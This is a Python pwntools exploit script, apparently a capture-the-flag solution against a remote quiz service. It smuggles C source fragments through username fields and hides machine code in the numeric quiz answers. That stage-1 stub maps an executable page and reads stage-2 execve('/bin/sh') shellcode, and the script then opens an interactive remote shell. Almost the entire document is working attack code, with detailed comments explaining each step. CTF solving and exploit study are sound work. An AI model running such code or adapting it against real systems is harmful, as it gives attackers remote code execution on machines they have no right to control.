from pwn import *
# Every asm()/shellcraft call below assembles for x86-64 Linux; pin that once.
context.update(arch="amd64")
import struct
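# Stage 1: a small x86-64 stub (46 bytes as assembled by pwntools) that
# mmap()s a fresh page, read()s stage 2 from fd 0 into it and jumps there.
# Instruction by instruction:
#   mov eax, 9 / xor edi, edi / mov esi, 4096 / or r8, -1 / mov edx, 7 /
#   mov r10d, 33 / xor r9d, r9d / syscall
#       -> mmap(NULL, 4096, PROT_READ|PROT_WRITE|PROT_EXEC (7),
#                MAP_SHARED|MAP_ANONYMOUS (0x21), fd=-1, offset=0)
#   mov edx, 4096 / mov rsi, rax / push rax / xor eax, eax / syscall
#       -> read(0, <page>, 4096). rdi is still 0 from the mmap setup (the
#          syscall ABI clobbers only rax, rcx, r11), so this reads stdin.
#          The page address is pushed before rax is reused for the syscall
#          number.
#   ret -> pops the saved page address and transfers control into stage 2.
# NOTE: the page is deliberately writable+executable (it is the landing zone
# for the shellcode). read()'s return value is not checked: a short read
# leaves the rest of the zero-filled anonymous page after the delivered
# bytes, and `ret` jumps in regardless.
stage1 = """
mov eax, 9
xor edi, edi
mov esi, 4096
or r8, -1
mov edx, 7
mov r10d, 33
xor r9d, r9d
syscall
mov edx, 4096
mov rsi, rax
push rax
xor eax, eax
syscall
ret
"""

# The quiz takes twelve 32-bit answers (every other entry in ``games`` sends
# [0]*12), i.e. 48 bytes. Fail loudly -- not via ``assert``, which is dropped
# under ``python -O`` -- if the stub ever outgrows that slot, and pad the
# remainder with NULs; they sit after ``ret`` and are never executed.
stage1_bin = asm(stage1)
if len(stage1_bin) > 48:
    raise ValueError(
        "stage1 is %d bytes; at most 48 (12 x int32) fit" % len(stage1_bin)
    )
stage1_bin = stage1_bin.ljust(48, b"\x00")

# Reinterpret the machine code as twelve little-endian *signed* ints. They
# are sent as decimal text, so the server presumably parses them with
# something like scanf("%d") -- TODO confirm against the challenge source.
stage1_payload = list(struct.unpack("<12i", stage1_bin))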
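# Stage 2: a stock execve("/bin/sh") shellcode, delivered raw into the page
# stage 1 mapped. Stage 1 issues exactly one read() of 4096 bytes, so the
# payload is sized to exactly that: padded with NULs when shorter, and
# rejected when longer -- ``ljust`` never truncates, and any excess bytes
# would stay on the socket and be consumed by whatever runs next.
stage2 = shellcraft.linux.sh()
stage2_bin = asm(stage2)
if len(stage2_bin) > 4096:
    raise ValueError(
        "stage2 is %d bytes; stage1 only reads 4096" % len(stage2_bin)
    )
stage2_bin = stage2_bin.ljust(4096, b"\x00")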
def _quiz_game(username, answers):
    """Build one ``miscgod`` quiz entry for ``games``.

    ``username`` is sent verbatim at the name prompt; ``answers`` is the list
    of twelve ints fed to the ``answer:`` prompts (see ``play_game``).
    """
    return {"quiz": "miscgod", "username": username, "answers": answers}


# Order matters: the four quiz rounds are played first, then the raw stage-2
# shellcode is written. The usernames ("const//", "int//", "main[]", ";//")
# read like fragments of a C declaration with the rest of each line
# commented out, and "main[]" carries the stage-1 machine code as its
# answers -- presumably the server stitches name and answers into a source
# file it then compiles and runs; TODO confirm against the challenge.
games = [
    _quiz_game("const//", [0] * 12),
    _quiz_game("int//", [0] * 12),
    _quiz_game("main[]", stage1_payload),
    _quiz_game(";//", [0] * 12),
    {"quiz": "pts.txt", "username": "hacked", "rawinput": stage2_bin},
]
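def play_game(r, game):
    """Play one round of the remote quiz described by *game*.

    Args:
        r: connected tube -- anything exposing ``sendlineafter`` and
            ``send`` (a pwntools ``remote`` in practice).
        game: dict with ``"quiz"`` and ``"username"`` (str, sent as UTF-8)
            plus exactly one payload key: ``"answers"`` (iterable of ints,
            one per ``answer: `` prompt) or ``"rawinput"`` (bytes written to
            the tube as-is).

    Raises:
        ValueError: if *game* carries neither payload key. This is checked
            before anything is sent, so a malformed entry fails cleanly
            instead of leaving the remote session half-played and then
            dying with a bare ``KeyError``.
    """
    if "answers" not in game and "rawinput" not in game:
        raise ValueError(
            "game needs either 'answers' or 'rawinput': %r" % (game,)
        )

    # Menu option 1, then the two free-text prompts; all three share the
    # same "> " delimiter, so order is what keeps them straight.
    r.sendlineafter(b"> ", b"1")
    r.sendlineafter(b"> ", game["username"].encode())
    r.sendlineafter(b"> ", game["quiz"].encode())

    if "answers" in game:
        for answer in game["answers"]:
            r.sendlineafter(b"answer: ", str(answer).encode())
    else:
        # No prompt to wait for here -- presumably by this point stage 1 is
        # blocked in its read() and consumes the bytes directly; TODO confirm.
        r.send(game["rawinput"])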
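def run(host="localhost", port=1337):
    """Connect to the challenge, play every entry of ``games`` in order and
    hand the resulting session (hopefully a shell) to the user.

    Args:
        host: target hostname or IP; defaults to a local instance.
        port: target TCP port; defaults to 1337, the previously hard-coded
            value, so existing callers are unaffected.
    """
    r = remote(host, port)
    try:
        for game in games:
            play_game(r, game)
        r.interactive()
    finally:
        # Always release the socket, whether a stage raised or the user
        # left interactive() with Ctrl-C/Ctrl-D.
        r.close()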